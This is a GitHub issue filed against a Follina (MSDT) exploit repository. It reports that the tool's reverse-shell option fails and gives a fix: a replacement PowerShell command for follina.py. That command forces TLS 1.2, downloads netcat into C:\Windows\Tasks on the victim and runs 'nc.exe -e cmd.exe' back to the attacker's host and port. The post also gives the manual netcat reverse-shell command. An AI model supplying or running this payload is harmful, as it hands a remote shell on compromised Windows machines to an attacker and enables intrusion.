msdt-follina
msdt-follina copied to clipboard
Get a reverse shell not working
According to Readme.md
you should be able to get a reverse shell just by running python3 follina.py -r 9001
, this didn't work for me and i had to manually download netcat on the victim machine from "https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe" then run nc.exe -e cmd.exe $HOST_IP
to successfully get a reverse shell in the attacker box.
Invoke-WebRequest complains about creating an SSL connection.
This can be fixed by changing line 113 in follina.py with:
command = f"""[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""